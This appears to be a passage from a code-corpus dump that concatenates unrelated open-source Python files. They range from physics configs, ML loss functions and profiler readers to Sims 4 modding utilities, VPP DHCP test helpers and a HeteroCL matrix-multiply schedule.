data.to_csv("%s\\simple_example.csv" % home_path, index=False)
else:
data.to_csv("%s/simple_example.csv" % home_path, index=False)
visualize_data(data) |
L1Trigger/L1TMuon/python/simMuonQualityAdjusterDigis_cfi.py | ckamtsikis/cmssw | 852 | 12671526 | import FWCore.ParameterSet.Config as cms
import os
simMuonQualityAdjusterDigis = cms.EDProducer('L1TMuonQualityAdjuster',
bmtfInput = cms.InputTag("simBmtfDigis", "BMTF"),
omtfInput = cms.InputTag("simOmtfDigis", "OMTF"),
emtfInput = cms.InputTag("simEmtfDigis", "EMTF"),
bmtfBxOffset = cms.int32(0),
)
|
model/item.py | luerhard/remapy | 172 | 12671532 | <reponame>luerhard/remapy<filename>model/item.py
from datetime import datetime
import time
from pathlib import Path
import json
from api.remarkable_client import RemarkableClient
import utils.config
#
# DEFINITIONS
#
STATE_SYNCING = 1
STATE_SYNCED = 2
STATE_DELETED = 170591
RFC3339Nano = "%Y-%m-%dT%H:%M:%SZ"
#
# HELPER
#
def get_path(id):
return "%s/%s" % (utils.config.PATH, id)
def get_path_remapy(id):
return "%s/.remapy" % get_path(id)
def get_path_metadata_local(id):
return "%s/metadata.local" % get_path_remapy(id)
def now_rfc3339():
return datetime.utcnow().strftime(RFC3339Nano)
#
# CLASS
#
class Item(object):
#
# CTOR
#
def __init__(self, metadata, parent=None):
self.metadata = metadata
self._parent = parent
self._children = []
self.path = get_path(self.id())
self.path_remapy = get_path_remapy(self.id())
self.path_metadata_local = get_path_metadata_local(self.id())
self.rm_client = RemarkableClient()
self.state_listener = []
#
# Getter and setter
#
def is_trash(self):
return self.id() == "trash"
def is_root(self):
return self.metadata is None
def id(self):
return self._meta_value("ID")
def name(self):
return self._meta_value("VissibleName")
def version(self):
return self._meta_value("Version", -1)
def bookmarked(self):
return self._meta_value("Bookmarked", False)
def is_document(self):
return self._meta_value("Type", "CollectionType") == "DocumentType"
def is_collection(self):
return self._meta_value("Type", "CollectionType") != "DocumentType"
def modified_time(self):
modified = self.metadata["ModifiedClient"]
if modified == None:
return None
try:
utc = datetime.strptime(modified, "%Y-%m-%dT%H:%M:%S.%fZ")
except:
utc = datetime.strptime(modified, "%Y-%m-%dT%H:%M:%SZ")
try:
epoch = time.mktime(utc.timetuple())
offset = datetime.fromtimestamp(epoch) - datetime.utcfromtimestamp(epoch)
except:
print("(Warning) Failed to parse datetime for item %s" % self.id())
return datetime(1970, 1, 1, 0, 0, 0)
return utc + offset
def parent(self):
return self._parent
def children(self):
return self._children
def _meta_value(self, key, root_value=""):
if self.is_root():
return root_value
return self.metadata[key]
#
# Functions
#
def set_bookmarked(self, bookmarked):
if self.is_trash() or self.is_root():
return
self.metadata["Bookmarked"] = bookmarked
self.metadata["ModifiedClient"] = now_rfc3339()
self.metadata["Version"] += 1
self.rm_client.update_metadata(self.metadata)
self._write_remapy_file()
self._update_state_listener()
def rename(self, new_name):
if self.is_trash() or self.is_root():
return
self.metadata["VissibleName"] = new_name
self.metadata["ModifiedClient"] = now_rfc3339()
self.metadata["Version"] += 1
self.rm_client.update_metadata(self.metadata)
self._write_remapy_file()
self._update_state_listener()
def move(self, new_parent):
if self.is_trash() or self.is_root():
return
self._parent = new_parent
self.metadata["Parent"] = new_parent.id()
self.metadata["ModifiedClient"] = now_rfc3339()
self.metadata["Version"] += 1
self.rm_client.update_metadata(self.metadata)
self._write_remapy_file()
self._update_state_listener()
def add_state_listener(self, listener):
self.state_listener.append(listener)
def _update_state_listener(self):
for listener in self.state_listener:
listener(self)
def _write_remapy_file(self):
if self.is_root():
return
Path(self.path_remapy).mkdir(parents=True, exist_ok=True)
with open(self.path_metadata_local, "w") as out:
out.write(json.dumps(self.metadata, indent=4)) |
hover/utils/denoising.py | phurwicz/hover | 251 | 12671558 | import math
import numpy as np
import torch
from collections import defaultdict
from hover.utils.torch_helper import cross_entropy_with_probs
def loss_coteaching_directed(y_student, y_teacher, target, forget_rate):
"""
Subroutine for loss_coteaching_graph.
"""
num_remember = math.ceil((1 - forget_rate) * target.size(0))
assert (
num_remember > 0
), f"Expected at least one remembered target, got {num_remember}"
loss_teacher_detail = cross_entropy_with_probs(y_teacher, target, reduction="none")
idx_to_learn = np.argsort(loss_teacher_detail.data)[:num_remember]
loss_student = cross_entropy_with_probs(
y_student[idx_to_learn], target[idx_to_learn], reduction="mean"
).unsqueeze(0)
return loss_student
def prediction_disagreement(pred_list, reduce=False):
"""
Compute disagreements between predictions.
"""
disagreement = defaultdict(dict)
for i in range(0, len(pred_list)):
for j in range(i, len(pred_list)):
_disagreed = np.not_equal(pred_list[i], pred_list[j])
if reduce:
_disagreed = np.mean(_disagreed)
disagreement[i][j] = _disagreed
disagreement[j][i] = _disagreed
return dict(disagreement)
def loss_coteaching_graph(y_list, target, tail_head_adjacency_list, forget_rate):
"""
Co-teaching from differences.
Generalized to graph representation where each vertex is a classifier and each edge is a source to check differences with and to learn from.
y_list: list of logits from different classifiers.
target: target, which is allowed to be probabilistic.
tail_head_adjacency_list: the 'tail' classifier learns from the 'head'.
forget_rate: the proportion of high-loss contributions to discard.
"""
# initialize co-teaching losses
loss_list = []
for i in range(0, len(y_list)):
assert tail_head_adjacency_list[i], f"Expected at least one teacher for {i}"
_losses = []
for j in tail_head_adjacency_list[i]:
# fetch yi as student(tail), yj as teacher(head)
_yi, _yj = y_list[i], y_list[j]
_tar = target
# add loss contribution to list
_contribution = loss_coteaching_directed(_yi, _yj, _tar, forget_rate)
_losses.append(_contribution)
# concatenate and average up
_loss = torch.mean(torch.cat(_losses))
loss_list.append(_loss)
return loss_list
def identity_adjacency(info_dict):
"""
Each node points to itself.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list)):
refs.append([i])
return refs
def cyclic_adjacency(info_dict, acc_bar=0.5):
"""
Nodes form a cycle.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list)):
candidate = (i + 1) % (len(acc_list))
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
return refs
def cyclic_except_last(info_dict, acc_bar=0.5):
"""
Cyclic except the last member.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list) - 1):
candidate = (i + 1) % (len(acc_list) - 1)
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
refs.append([len(acc_list) - 1])
return refs
def accuracy_priority(info_dict, acc_bar=0.5):
"""
Every node points at the most accurate member that is not itself.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list)):
top_candidates = sorted(
range(len(acc_list)), key=lambda j: acc_list[j], reverse=True
)
candidate = top_candidates[0] if top_candidates[0] != i else top_candidates[1]
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
return refs
def disagreement_priority(info_dict, acc_bar=0.5):
"""
Everyone node points at the most different member that is not itself.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
disagree_dict = info_dict["disagreement_rate"]
for i in range(0, len(acc_list)):
top_candidates = sorted(
disagree_dict[i].keys(), key=lambda j: disagree_dict[i][j], reverse=True
)
candidate = top_candidates[0] if top_candidates[0] != i else top_candidates[1]
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
return refs
|
examples/nitro.py | msabramo/diesel | 224 | 12671573 | <gh_stars>100-1000
from pynitro import NitroFrame
from diesel.protocols.nitro import DieselNitroSocket
from diesel import quickstart, quickstop
#loc = "tcp://127.0.0.1:4444"
loc = "inproc://foobar"
def server():
with DieselNitroSocket(bind=loc) as sock:
while True:
m = sock.recv()
sock.send(NitroFrame("you said: " + m.data))
def client():
with DieselNitroSocket(connect=loc) as sock:
for x in xrange(100000):
sock.send(NitroFrame("Hello, dude!"))
m = sock.recv()
assert m.data == "you said: Hello, dude!"
quickstop()
quickstart(server, client)
|
python-for-beginners/02 - Print/coding_challenge_solution.py | vijayraavi/c9-python-getting-started | 8,041 | 12671580 | # Here's a challenge for you to help you practice
# See if you can fix the code below
# print the message
# There was a single quote inside the string!
# Use double quotes to enclose the string
print("Why won't this line of code print")
# print the message
# There was a mistake in the function name
print('This line fails too!')
# print the message
# Need to add the () around the string
print ("I think I know how to fix this one")
# print the name entered by the user
# You need to store the value returned by the input statement
# in a variable
name = input('Please tell me your name: ')
print(name)
|
scripts/nvvpreader/nvvpreader.py | SymbioticLab/Salus | 104 | 12671669 | #
# Copyright 2019 <NAME> <<EMAIL>>
#
# This file is part of Salus
# (see https://github.com/SymbioticLab/Salus).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, print_function, division
import sqlite3 as sql
import struct
import pandas as pd
from datetime import datetime
from tqdm import tqdm
metric_name = {
19923062: 'achieved_occupancy',
19923058: 'executed_ipc'
}
event_name = {
83886184: 'active_warps',
83886182: 'active_cycles',
83886183: 'elapsed_cycles_sm',
}
def parseMetricValue(binstr):
return struct.unpack('d', binstr)[0]
def parseEventValue(s):
return int(s)
def parseNanoTime(nanotime):
return datetime.utcfromtimestamp(nanotime / 1e9)
class Metric(object):
def __init__(self, row):
super(Metric, self).__init__()
class Kernel(object):
def __init__(self, row, refpoint):
super(Kernel, self).__init__()
self.id = row['correlationId']
self.start = row['start'] - refpoint
self.end = row['end'] - refpoint
self.duration = self.end - self.start
self.name = row['name']
class NvvpReader(object):
def __init__(self, filepath, progress=False):
super(NvvpReader, self).__init__()
self.filepath = filepath
self.dbLoaded = False
self.loadDB(progress)
def loadDB(self, progress):
if self.dbLoaded:
return
self.dbLoaded = True
self.conn = sql.connect(self.filepath)
self.conn.row_factory = sql.Row
prog_wrapper = tqdm if progress else lambda x, *args, **kwargs: x
cursor = self.conn.cursor()
# get timeline reference point (start time of the first overhead event is 0ns)
cursor.execute("""select start from CUPTI_ACTIVITY_KIND_OVERHEAD order by start""")
(self.refpoint, ) = cursor.fetchone()
self.refpoint = parseNanoTime(self.refpoint)
# get all kernels
total_amount = 0
if progress:
cursor.execute('select count(*) from CUPTI_ACTIVITY_KIND_KERNEL')
(total_amount, ) = cursor.fetchone()
cursor.execute("""select strings.value as strname, kernel.*
from CUPTI_ACTIVITY_KIND_KERNEL as kernel, StringTable as strings
where kernel.name = strings._id_""")
# create dataset
data = []
cursor2 = self.conn.cursor()
for row in prog_wrapper(cursor, total=total_amount):
correlationId = row['correlationId']
kernel = {
'id': correlationId,
'start': parseNanoTime(row['start']),
'end': parseNanoTime(row['end']),
'duration': row['end'] - row['start'],
'name': row['strname'],
}
# fetch all instances metric on this kernel
for ins, val, metric_id in cursor2.execute("""select instance, value, id
from CUPTI_ACTIVITY_KIND_METRIC_INSTANCE
where correlationId=?""",
[correlationId]):
val = parseMetricValue(val)
observation = {
'metric': metric_name[metric_id],
'sm': ins,
'metric_val': val
}
observation.update(kernel)
data.append(observation)
# fetch all aggregated metric
for val, metric_id in cursor2.execute("""select value, id
from CUPTI_ACTIVITY_KIND_METRIC
where correlationId=?""",
[correlationId]):
val = parseMetricValue(val)
observation = {
'metric': metric_name[metric_id],
'sm': -1,
'metric_val': val
}
observation.update(kernel)
data.append(observation)
# fetch all instances events on this kernel
for ins, val, event_id in cursor2.execute("""select instance, value, id
from CUPTI_ACTIVITY_KIND_EVENT_INSTANCE
where correlationId=?""",
[correlationId]):
val = parseEventValue(val)
observation = {
'event': event_name[event_id],
'sm': ins,
'event_val': val
}
observation.update(kernel)
data.append(observation)
# fetch all aggregated events on this kernel
for val, event_id in cursor2.execute("""select value, id
from CUPTI_ACTIVITY_KIND_EVENT
where correlationId=?""",
[correlationId]):
val = parseEventValue(val)
observation = {
'event': event_name[event_id],
'sm': -1,
'event_val': val
}
observation.update(kernel)
data.append(observation)
self.kernels = pd.DataFrame(data)
|
tests/em/static/test_DC_1D_jvecjtvecadj.py | Prithwijit-Chak/simpeg | 358 | 12671691 | <filename>tests/em/static/test_DC_1D_jvecjtvecadj.py
from __future__ import print_function
import unittest
import numpy as np
from discretize import TensorMesh
from SimPEG import (
maps,
data_misfit,
regularization,
inversion,
optimization,
inverse_problem,
tests,
)
from SimPEG.utils import mkvc
from SimPEG.electromagnetics import resistivity as dc
np.random.seed(40)
TOL = 1e-5
FLR = 1e-20 # "zero", so if residual below this --> pass regardless of order
class DC1DSimulation(unittest.TestCase):
def setUp(self):
ntx = 31
xtemp_txP = np.logspace(1, 3, ntx)
xtemp_txN = -xtemp_txP
ytemp_tx = np.zeros(ntx)
xtemp_rxP = -5
xtemp_rxN = 5
ytemp_rx = 0.0
abhalf = abs(xtemp_txP - xtemp_txN) * 0.5
a = xtemp_rxN - xtemp_rxP
b = ((xtemp_txN - xtemp_txP) - a) * 0.5
# We generate tx and rx lists:
srclist = []
for i in range(ntx):
rx = dc.receivers.Dipole(
np.r_[xtemp_rxP, ytemp_rx, -12.5], np.r_[xtemp_rxN, ytemp_rx, -12.5]
)
locA = np.r_[xtemp_txP[i], ytemp_tx[i], -12.5]
locB = np.r_[xtemp_txN[i], ytemp_tx[i], -12.5]
src = dc.sources.Dipole([rx], locA, locB)
srclist.append(src)
survey = dc.survey.Survey(srclist)
rho = np.r_[10, 10, 10]
dummy_hz = 100.0
hz = np.r_[10, 10, dummy_hz]
mesh = TensorMesh([hz])
simulation = dc.simulation_1d.Simulation1DLayers(
survey=survey,
rhoMap=maps.ExpMap(mesh),
thicknesses=hz[:-1],
data_type="apparent_resistivity",
)
simulation.dpred(np.log(rho))
mSynth = np.log(rho)
dobs = simulation.make_synthetic_data(mSynth, add_noise=True)
# Now set up the problem to do some minimization
dmis = data_misfit.L2DataMisfit(simulation=simulation, data=dobs)
reg = regularization.Tikhonov(mesh)
opt = optimization.InexactGaussNewton(
maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6
)
invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=0.0)
inv = inversion.BaseInversion(invProb)
self.inv = inv
self.reg = reg
self.p = simulation
self.mesh = mesh
self.m0 = mSynth
self.survey = survey
self.dmis = dmis
self.dobs = dobs
def test_misfit(self):
passed = tests.checkDerivative(
lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)],
self.m0,
plotIt=False,
num=3,
)
self.assertTrue(passed)
def test_adjoint(self):
# Adjoint Test
# u = np.random.rand(self.mesh.nC*self.survey.nSrc)
v = np.random.rand(self.mesh.nC)
w = np.random.rand(mkvc(self.dobs).shape[0])
wtJv = w.dot(self.p.Jvec(self.m0, v))
vtJtw = v.dot(self.p.Jtvec(self.m0, w))
passed = np.abs(wtJv - vtJtw) < 1e-8
print("Adjoint Test", np.abs(wtJv - vtJtw), passed)
self.assertTrue(passed)
def test_dataObj(self):
passed = tests.checkDerivative(
lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=3
)
self.assertTrue(passed)
if __name__ == "__main__":
unittest.main()
|
typed_python/compiler/function_metadata.py | APrioriInvestments/typed_python | 105 | 12671735 | class FunctionMetadata:
def __init__(self):
self._constantReturnValue = ()
def setConstantReturnValue(self, value):
self._constantReturnValue = (value,)
def hasConstantReturnValue(self):
return self._constantReturnValue
def getConstantReturnValue(self):
return self._constantReturnValue[0] if self._constantReturnValue else None
|
uq360/utils/transformers/original_features.py | Sclare87/UQ360 | 148 | 12671751 | from uq360.utils.transformers.feature_transformer import FeatureTransformer
class OriginalFeaturesTransformer(FeatureTransformer):
'''
Dummy/identity transformer which passes the data array through unchanged.
'''
def __init__(self):
super(OriginalFeaturesTransformer, self).__init__()
@classmethod
def name(cls):
return ('original_features')
def transform(self, x, predictions):
return x
def save(self, output_dir=None):
pass
def load(self, input_dir=None):
pass
|
Python/Biopython/read_seq.py | Gjacquenot/training-material | 115 | 12671759 | <filename>Python/Biopython/read_seq.py
#!/usr/bin/env python
from argparse import ArgumentParser
from Bio import SeqIO, SeqUtils
from collections import namedtuple
SeqStats = namedtuple('SeqStats', ['length', 'gc', 'weight'])
def compute_stats(seq):
stats = SeqStats
stats.length = len(seq)
stats.gc = SeqUtils.GC(seq)
try:
stats.weight = SeqUtils.molecular_weight(seq)
except ValueError:
stats.weight = None
return stats
if __name__ == '__main__':
arg_parser = ArgumentParser(description='Read sequence file and '
'compute some statistics')
arg_parser.add_argument('file', help='sequence file to parse')
arg_parser.add_argument('--format', default='fasta', help='file format')
options = arg_parser.parse_args()
seqs = {}
for seq_record in SeqIO.parse(options.file, options.format):
seqs[seq_record.id] = seq_record.seq
fmt_str = ('id: {id}\n\t'
'length: {stats.length}\n\t'
'gc: {stats.gc}\n\t'
'molecular weight: {stats.weight}')
for id, seq in seqs.items():
seq_stats = compute_stats(seq)
print(fmt_str.format(id=id, stats=seq_stats))
print('{0:d} sequences'.format(len(seqs)))
|
Python-3/basic_examples/decorator.py | ghiloufibelgacem/jornaldev | 1,139 | 12671765 | array = ['a', 'b', 'c']
def decorator(func):
def newValueOf(pos):
if pos >= len(array):
print("Oops! Array index is out of range")
return
func(pos)
return newValueOf
@decorator
def valueOf(index):
print(array[index])
valueOf(10)
|
aries_cloudagent/tails/error.py | kuraakhilesh8230/aries-cloudagent-python | 247 | 12671818 | """Tails server related errors."""
from ..core.error import BaseError
class TailsServerNotConfiguredError(BaseError):
"""Error indicating the tails server plugin hasn't been configured."""
|
src/sims4communitylib/utils/whims/common_satisfaction_reward_store_utils.py | velocist/TS4CheatsInfo | 118 | 12671843 | <reponame>velocist/TS4CheatsInfo<gh_stars>100-1000
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Tuple, Dict, Callable, Iterator
import sims4.collections
from rewards.reward import Reward
from sims4.resources import Types
from sims4communitylib.utils.common_resource_utils import CommonResourceUtils
from sims4communitylib.utils.whims.common_satisfaction_reward_store_item import CommonSatisfactionRewardStoreItem
from whims.whims_tracker import WhimsTracker
class CommonSatisfactionRewardStoreUtils:
"""Utilities for manipulating the Satisfaction Rewards Store.
"""
@staticmethod
def add_reward_trait_to_rewards_store(reward_trait_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_trait_to_rewards_store(reward_trait_definition_id, reward_point_cost)
Add a Reward Trait to the Satisfaction Rewards Store.
:param reward_trait_definition_id: The decimal identifier of a Reward Trait.
:type reward_trait_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward Trait will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Trait was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_trait_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.TRAIT)
@staticmethod
def add_reward_buff_to_rewards_store(reward_buff_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_buff_to_rewards_store(reward_buff_definition_id, reward_point_cost)
Add a Reward Buff to the Satisfaction Rewards Store.
:param reward_buff_definition_id: The decimal identifier of a Reward Buff.
:type reward_buff_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward Buff will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Reward Buff was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_buff_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.BUFF)
@staticmethod
def add_reward_object_to_rewards_store(reward_object_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_object_to_rewards_store(reward_object_definition_id, reward_point_cost)
Add a Reward Object to the Satisfaction Rewards Store.
:param reward_object_definition_id: The decimal identifier of a Reward Object.
:type reward_object_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward Object will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Reward Object was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_object_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.OBJECT)
@staticmethod
def add_reward_cas_part_to_rewards_store(reward_cas_part_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_cas_part_to_rewards_store(reward_cas_part_definition_id, reward_point_cost)
Add a Reward CAS Part to the Satisfaction Rewards Store.
:param reward_cas_part_definition_id: The decimal identifier of a Reward CAS Part.
:type reward_cas_part_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward CAS Part will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Reward CAS Part was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_cas_part_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.CASPART)
@staticmethod
def remove_reward_from_rewards_store(reward_item_definition_id: int) -> bool:
"""remove_reward_from_rewards_store(reward_item_definition_id)
Remove a Reward Item from the Satisfaction Rewards Store.
:param reward_item_definition_id: The decimal identifier of a Reward Item.
:type reward_item_definition_id: int
:return: True, if the Reward Item was removed from the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._remove_reward_from_rewards_store(reward_item_definition_id)
@staticmethod
def get_all_satisfaction_reward_store_items_generator(
include_satisfaction_reward_callback: Callable[[CommonSatisfactionRewardStoreItem], bool]=None
) -> Iterator[CommonSatisfactionRewardStoreItem]:
"""get_all_satisfaction_reward_store_items_generator(include_satisfaction_reward_callback=None)
Retrieve all Satisfaction Rewards in the Satisfaction Rewards Store.
:param include_satisfaction_reward_callback: If the result of this callback is True, the Satisfaction Reward\
and Satisfaction Reward Data (Cost, Award Type), will be included in the results. If set to None, All Satisfaction Rewards will be included.
:type include_satisfaction_reward_callback: Callable[[CommonRewardStoreItem]], bool], optional
:return: All items from the satisfaction reward store.
:rtype: Iterator[CommonSatisfactionRewardStoreItem]
"""
satisfaction_reward_store_items: Dict[Reward, Tuple[int, WhimsTracker.WhimAwardTypes]] = dict(WhimsTracker.SATISFACTION_STORE_ITEMS)
for (reward, data) in satisfaction_reward_store_items:
reward_cost = data[0]
reward_type = data[1]
reward_store_item = CommonSatisfactionRewardStoreItem(reward, reward_cost, reward_type)
if include_satisfaction_reward_callback is not None and not include_satisfaction_reward_callback(reward_store_item):
continue
yield reward_store_item
@staticmethod
def _add_reward_to_rewards_store(reward_definition_id: int, reward_point_cost: int, reward_type: WhimsTracker.WhimAwardTypes) -> bool:
sim_reward_instance = CommonSatisfactionRewardStoreUtils._load_reward_instance(reward_definition_id)
if sim_reward_instance is None:
return False
sim_reward_data_immutable_slots_cls = sims4.collections.make_immutable_slots_class(['cost', 'award_type'])
reward_data = sim_reward_data_immutable_slots_cls(dict(cost=reward_point_cost, award_type=reward_type))
store_items = dict(WhimsTracker.SATISFACTION_STORE_ITEMS)
store_items[sim_reward_instance] = reward_data
WhimsTracker.SATISFACTION_STORE_ITEMS = sims4.collections.FrozenAttributeDict(store_items)
return True
@staticmethod
def _remove_reward_from_rewards_store(reward_definition_id: int) -> bool:
sim_reward_instance = CommonSatisfactionRewardStoreUtils._load_reward_instance(reward_definition_id)
if sim_reward_instance is None:
return False
store_items = dict(WhimsTracker.SATISFACTION_STORE_ITEMS)
if sim_reward_instance in store_items:
del store_items[sim_reward_instance]
WhimsTracker.SATISFACTION_STORE_ITEMS = sims4.collections.FrozenAttributeDict(store_items)
return True
@staticmethod
def _load_reward_instance(reward_definition_id: int) -> Reward:
return CommonResourceUtils.load_instance(Types.REWARD, reward_definition_id)
|
src/plugins/dhcp/test/vpp_dhcp.py | amithbraj/vpp | 751 | 12671907 | from vpp_object import VppObject
class VppDHCPProxy(VppObject):
def __init__(
self,
test,
dhcp_server,
dhcp_src_address,
rx_vrf_id=0,
server_vrf_id=0,
):
self._test = test
self._rx_vrf_id = rx_vrf_id
self._server_vrf_id = server_vrf_id
self._dhcp_server = dhcp_server
self._dhcp_src_address = dhcp_src_address
def set_proxy(
self,
dhcp_server,
dhcp_src_address,
rx_vrf_id=0,
server_vrf_id=0):
if self.query_vpp_config():
raise Exception('Vpp config present')
self._rx_vrf_id = rx_vrf_id
self._server_vrf_id = server_vrf_id
self._dhcp_server = dhcp_server
self._dhcp_src_address = dhcp_src_address
def add_vpp_config(self):
self._test.vapi.dhcp_proxy_config(
is_add=1,
rx_vrf_id=self._rx_vrf_id,
server_vrf_id=self._server_vrf_id,
dhcp_server=self._dhcp_server,
dhcp_src_address=self._dhcp_src_address)
self._test.registry.register(self, self._test.logger)
def remove_vpp_config(self):
self._test.vapi.dhcp_proxy_config(
rx_vrf_id=self._rx_vrf_id,
server_vrf_id=self._server_vrf_id,
dhcp_server=self._dhcp_server,
dhcp_src_address=self._dhcp_src_address,
is_add=0)
def get_vpp_dump(self):
dump = self._test.vapi.dhcp_proxy_dump()
for entry in dump:
if entry.rx_vrf_id == self._rx_vrf_id:
return entry
def query_vpp_config(self):
dump = self.get_vpp_dump()
return True if dump else False
def object_id(self):
return "dhcp-proxy-%d" % self._rx_vrf_id
class VppDHCPClient(VppObject):
def __init__(
self,
test,
sw_if_index,
hostname,
id=None,
want_dhcp_event=False,
set_broadcast_flag=True,
dscp=None,
pid=None):
self._test = test
self._sw_if_index = sw_if_index
self._hostname = hostname
self._id = id
self._want_dhcp_event = want_dhcp_event
self._set_broadcast_flag = set_broadcast_flag
self._dscp = dscp
self._pid = pid
def set_client(
self,
sw_if_index,
hostname,
id=None,
want_dhcp_event=False,
set_broadcast_flag=True,
dscp=None,
pid=None):
if self.query_vpp_config():
raise Exception('Vpp config present')
self._sw_if_index = sw_if_index
self._hostname = hostname
self._id = id
self._want_dhcp_event = want_dhcp_event
self._set_broadcast_flag = set_broadcast_flag
self._dscp = dscp
self._pid = pid
def add_vpp_config(self):
id = self._id.encode('ascii') if self._id else None
client = {'sw_if_index': self._sw_if_index, 'hostname': self._hostname,
'id': id,
'want_dhcp_event': self._want_dhcp_event,
'set_broadcast_flag': self._set_broadcast_flag,
'dscp': self._dscp, 'pid': self._pid}
self._test.vapi.dhcp_client_config(is_add=1, client=client)
self._test.registry.register(self, self._test.logger)
def remove_vpp_config(self):
client = client = {
'sw_if_index': self._sw_if_index,
'hostname': self._hostname}
self._test.vapi.dhcp_client_config(client=client, is_add=0)
def get_vpp_dump(self):
dump = self._test.vapi.dhcp_client_dump()
for entry in dump:
if entry.client.sw_if_index == self._sw_if_index:
return entry
def query_vpp_config(self):
dump = self.get_vpp_dump()
return True if dump else False
def object_id(self):
return "dhcp-client-%s/%d" % (self._hostname, self._sw_if_index)
|
xautodl/datasets/math_core.py | Joey61Liuyi/AutoDL-Projects | 817 | 12671924 | #####################################################
# Copyright (c) <NAME> [GitHub D-X-Y], 2021.05 #
#####################################################
from .math_static_funcs import (
LinearSFunc,
QuadraticSFunc,
CubicSFunc,
QuarticSFunc,
ConstantFunc,
ComposedSinSFunc,
ComposedCosSFunc,
)
from .math_dynamic_funcs import (
LinearDFunc,
QuadraticDFunc,
SinQuadraticDFunc,
BinaryQuadraticDFunc,
)
from .math_dynamic_generator import UniformDGenerator, GaussianDGenerator
|
packs/consul/actions/query_node.py | userlocalhost2000/st2contrib | 164 | 12671949 | <gh_stars>100-1000
from lib import action
class ConsulQueryNodeAction(action.ConsulBaseAction):
def run(self, node):
index, node = self.consul.catalog.node(node)
return node
|
flextensor/testing/others/hand-craft/schedule_gemm_vhls.py | imxian/FlexTensor | 135 | 12671955 | import heterocl as hcl
def kernel_gemm(A, B):
k = hcl.reduce_axis(0, A.shape[1], "k")
return hcl.compute(
(A.shape[0], B.shape[1]),
lambda i, j: hcl.sum(A[i, k] * B[k, j], axis=k),
"C")
def main():
M = 512
N = 512
K = 512
A = hcl.placeholder((M, K), dtype="float32", name="A")
B = hcl.placeholder((K, N), dtype="float32", name="B")
s = hcl.create_schedule([A, B], kernel_gemm)
# split
C = kernel_gemm.C
m, n, k = s[C].op.axis
mo, mi = s[C].split(m, factor=16)
no, ni = s[C].split(n, factor=32)
ko, ki = s[C].split(k, factor=8)
# reorder shuffle
s[C].reorder(mo, no, mi, ni, ko, ki)
# reorder local
s[C].reorder(mi, ko, ki, ni)
# reshape
s.reshape(C, [512//16, 16, 512//32, 32])
# partition
s.partition(A, dim=3)
# pipeline
s[C].pipeline(mi)
# reuse_at
# nothing to do
print(hcl.build(s, target="vhls"))
if __name__ == "__main__":
main()
"""
// result:
#include <ap_int.h>
#include <ap_fixed.h>
#include <math.h>
void default_function(float A[512][512], float B[512][512], ap_int<32> C[32][16][16][32]) {
#pragma HLS array_partition variable=A complete dim=3
for (ap_int<32> i_outer = 0; i_outer < 32; ++i_outer) {
for (ap_int<32> j_outer = 0; j_outer < 16; ++j_outer) {
for (ap_int<32> i_inner = 0; i_inner < 16; ++i_inner) {
#pragma HLS pipeline
for (ap_int<32> k_outer = 0; k_outer < 64; ++k_outer) {
ap_int<32> sum;
sum = 0;
for (ap_int<32> k_inner = 0; k_inner < 8; ++k_inner) {
for (ap_int<32> j_inner = 0; j_inner < 32; ++j_inner) {
